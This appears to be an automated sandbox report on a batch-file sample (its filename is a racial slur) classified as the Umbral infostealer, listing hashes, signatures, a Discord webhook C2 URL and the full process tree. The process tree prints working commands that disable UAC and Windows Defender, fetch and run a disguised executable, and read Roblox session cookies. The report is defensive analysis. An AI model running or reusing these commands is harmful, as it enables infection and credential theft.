Overview

overview

10

Static

static

1

nigga2.bat

windows7-x64

10

nigga2.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/03/2025, 22:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    nigga2.bat

  • Size

    1KB

  • MD5

    06aafbdb0650ecee01c1bdb6b7b51fdb

  • SHA1

    ad8c1f0ca620d813ce8e3280139817db583f9c4e

  • SHA256

    3b5953d3ea0420345b5c1e9efdbb88ea80bcaa99f2582834c2cd545efa84880c

  • SHA512

    039a8ca7db486f7c473a07c22c4269c211fc44175d3fb480eeaf5435df23a70151927940b0bf6a7bbc29b12b1d9a84ab5240686e05cc9daae0d54920d2d84fb9

Score
10/10
umbraldefense_evasionexecutionspywarestealertrojan

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1346186242164916254/XSGGtSWs1IP-qhWb9F-7vKZ6AbJ1Ah-y8ACFyf9MRP2SkcfW16QzCkiWhzv0YmF7kEXM

Signatures

  • Detect Umbral payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
    defense_evasiontrojan
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Powershell Invoke Web Request.

    execution
  • Downloads MZ/PE file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\nigga2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-ExecutionPolicy Unrestricted -Force; Set-ItemProperty -Path 'REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'ConsentPromptBehaviorAdmin' -Value 0; Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableBlockAtFirstSeen $true; Set-MpPreference -SubmitSamplesConsent 2; Set-Service -Name WinDefend -StartupType Disabled; Stop-Service -Name WinDefend;"
      2⤵
      • UAC bypass
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5392
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/pizq3/dfsdfdfs/releases/download/sex/File.1.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Downloads MZ/PE file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1196
    • C:\Windows\system32\timeout.exe
      timeout /t 2
      2⤵
      • Delays execution with timeout.exe
      PID:2316
    • C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe
      "C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4908
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:392
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2296
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5828
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2704
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
          PID:4600
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:5360
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          3⤵
          • Detects videocard installed
          PID:1888
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5548
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3124

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      b385929194b875890a5f11dff37cc0b0

      SHA1

      dcafb5e5ea30dbfe0a4da43726366f6a2b0d6d1a

      SHA256

      47592ecc8084a456e10de6b4e2a96121deb12fd004c42f1f3b0e124ecc8d533b

      SHA512

      830f2b6321d300272a211f1beeebb5d4f1bdcbc3c7b4558efb438b1af5dc745f71408cec1bff51545e0250b21d7a2da68eb6d7df31eaae87065316cb43b74613

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      548dd08570d121a65e82abb7171cae1c

      SHA1

      1a1b5084b3a78f3acd0d811cc79dbcac121217ab

      SHA256

      cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

      SHA512

      37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      107102102e02e48f37f5318c7e113c43

      SHA1

      7fb10fc65c85fb4c050309f0872bc9389dcccc0d

      SHA256

      3c3f49948c1e832c86b959c32bc288ddedb500534b74df082f8967fc7f9976f7

      SHA512

      b108a47d7c3dd154cad44362b6cd557b7064096383d100e6cd64bfb19c4e2ad878ed4ee800776322ad3cc4bb721fb675b0ecab8f5661024188fa3aa19561841b

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      38d2bbd81ef754e8dfbe6e448e60fb68

      SHA1

      c37b48ddfe4767f578a319891126e3deb8f9cbec

      SHA256

      ba033cee7b97f63d1d7ea61c775302106a92af27b979eee1a68596854fe56996

      SHA512

      b359fd91a0736e1b4b1813e0efd388f94fd11544a54575ab1010da19c639e6815130d29d961bc724e569505555b460060370b3ec3b03d11ecf10806da88e2d28

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      0f6a3762a04bbb03336fb66a040afb97

      SHA1

      0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

      SHA256

      36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

      SHA512

      cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      0dfc87d52784026f73d57192cb575195

      SHA1

      720cfc0cff7f21a4ab235f5b3a16beb28ea6d9fd

      SHA256

      bfd4b6a533b4e3a2a884e6f1445f646a3d83a41f6e4060964279c9b4c87a5ef2

      SHA512

      c6c98a666ff7880bdeaae69e200ee93fe0d6e0bfd4046bd184cf5d8209fd18439f9bfb8e3e8b5e75656c3c0deaf2dea2843061df1c2a98310dd5405cb7458604

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      88f48c82ed7aabf6b09985139fb7bf1e

      SHA1

      9ac90ae480f09c07c25344ce9ac17067ea1a22b8

      SHA256

      31763408f851819dc42f35fcc2c71cee6683937e5f42129982cdfb1cf46b8847

      SHA512

      233f033ddc883fa92c475681ee82edfb774a0a33402e9acf10f49aed62b599b753baf0ac27733723af7b7c2e31633c4a049bbd824f14e6cb55f7b917c2f74966

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      948B

      MD5

      35d9cbd358e192d96e38c1cb959f9b85

      SHA1

      3066347cf718f9f1a9df21f494bafc8647196727

      SHA256

      2e9ca12397dbea04549a456382bd2d1376ae2f7008572fe3da7198176e938956

      SHA512

      6188e89c6fa27adaf4b492bab0961e8c42232aa00252a486d40e64a6fe5fe71dc574bf39e95bf8d706d7de211140e864c697be1cc8e8ca26bcaaa1b3069a5c3a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_feeapzau.tsu.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe
      Filesize

      229KB

      MD5

      d7a6b25c7efcf58e4f295fff84851c0b

      SHA1

      2b6ad97ec2085aa658cbd304b15e1b540971bfa4

      SHA256

      1ada25029046890a7d7464603fab2e95b21edab871ce27efc7975b468febeaaf

      SHA512

      0fc3d60d54580688018e9029a80f86c3fa919a71407939d8b72f3c209ae9137a889c986ce6c4338b1e1c045c93c81aa04a12a73280f9d0e77f0691a83de126cb

      Download Submit

    • memory/1196-18-0x00007FFED7950000-0x00007FFED8411000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1196-28-0x00007FFED7950000-0x00007FFED8411000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1196-29-0x00007FFED7950000-0x00007FFED8411000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1196-33-0x00007FFED7950000-0x00007FFED8411000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3124-131-0x000001C5C6080000-0x000001C5C6081000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3124-130-0x000001C5C6080000-0x000001C5C6081000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3124-135-0x000001C5C6080000-0x000001C5C6081000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3124-136-0x000001C5C6080000-0x000001C5C6081000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3124-137-0x000001C5C6080000-0x000001C5C6081000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3124-138-0x000001C5C6080000-0x000001C5C6081000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3124-139-0x000001C5C6080000-0x000001C5C6081000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3124-140-0x000001C5C6080000-0x000001C5C6081000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3124-141-0x000001C5C6080000-0x000001C5C6081000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3124-129-0x000001C5C6080000-0x000001C5C6081000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4908-74-0x000002207DDC0000-0x000002207DDDE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4908-111-0x000002207E1D0000-0x000002207E1E2000-memory.dmp

      Filesize

      72KB

      Download

    • memory/4908-110-0x000002207DD50000-0x000002207DD5A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4908-37-0x00000220638D0000-0x0000022063910000-memory.dmp

      Filesize

      256KB

      Download

    • memory/4908-73-0x000002207DD70000-0x000002207DDC0000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4908-72-0x000002207E050000-0x000002207E0C6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/5392-6-0x0000016535ED0000-0x0000016535EF2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/5392-0-0x00007FFED7953000-0x00007FFED7955000-memory.dmp

      Filesize

      8KB

      Download

    • memory/5392-11-0x00007FFED7950000-0x00007FFED8411000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5392-12-0x00007FFED7950000-0x00007FFED8411000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5392-13-0x00007FFED7950000-0x00007FFED8411000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5392-16-0x00007FFED7950000-0x00007FFED8411000-memory.dmp

      Filesize

      10.8MB

      Download